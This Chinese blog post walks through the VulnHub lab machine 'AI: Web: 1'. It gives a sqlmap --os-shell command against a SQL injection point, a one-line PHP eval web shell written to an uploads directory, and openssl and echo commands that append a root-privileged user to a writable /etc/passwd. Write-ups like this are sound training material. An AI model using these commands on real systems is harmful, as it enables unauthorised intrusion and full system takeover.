Vulnhub——AI: WEB: 1

渗透复现

(1)目录扫描爆破出隐藏页面info.php和传参页面,泄露网站绝对路径并且存在SQL注入点

(2)已知网站绝对路径,存在SQL注入点,尝试OS-shell写入

(3)OS-shell写入后进行反弹shell,获取3W的shell后进行信息收集发现/etc/passwd的属主是3W

(4)Openssl生成密码,在/etc/passwd文件中直接写入root用户

知识扩展

OS-shell,Openssl的利用

Linux /etc/passwd文件写入root用户进行提权

靶机地址

AI: Web: 1 ~ VulnHub

主机发现

(1)攻击机

192.168.88.128

(2)目标主机

192.168.88.139

信息收集

端口扫描

端口访问

目录扫描

目录爆破

目录访问

(1)/robots.txt

(2)/m3diNf0/

(3)/se3reTdir777/uploads/

(4)/se3reTdir777/

实施攻击

(1)/m3diNf0/目录进行扫描和爆破

(2)访问/m3diNf0/info.php,发现网站的绝对路径

(3)前面收集到的/se3reTdir777/页面存在传参点,BP抓包,进行注入测试

(4)已知网站绝对路径,尝试进行os-shell的写入

#将数据包内容保存至1.txt文件中
sqlmap -r 1.txt --level=3 --os-shell

(5)os-shell的写入需要目录有写入权限

#结合获取的网站根路径和已知路径,进行os-shell写入尝试
/home/www/html/web1x443290o2sdf92213/m3diNf0/
/home/www/html/web1x443290o2sdf92213/se3reTdir777/
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

(6)利用os-shell在upload目录下写shell

echo '<?php eval($_POST[123]);?>' > /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php

(7)蚁剑连接,这里需要相对路径访问,绝对路径无法访问

提权

(1)反弹shell

(2)信息收集

(3)/etc/passwd属主为3W,具备可读可写权,直接在/etc/pass写入root权限用户

openssl passwd -1 -salt yeah 123
echo 'yeah:$1$yeah$DESxTjElMCcWPYD62gkyC1:0:0::/root:/bin/bash' >> /etc/passwd

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值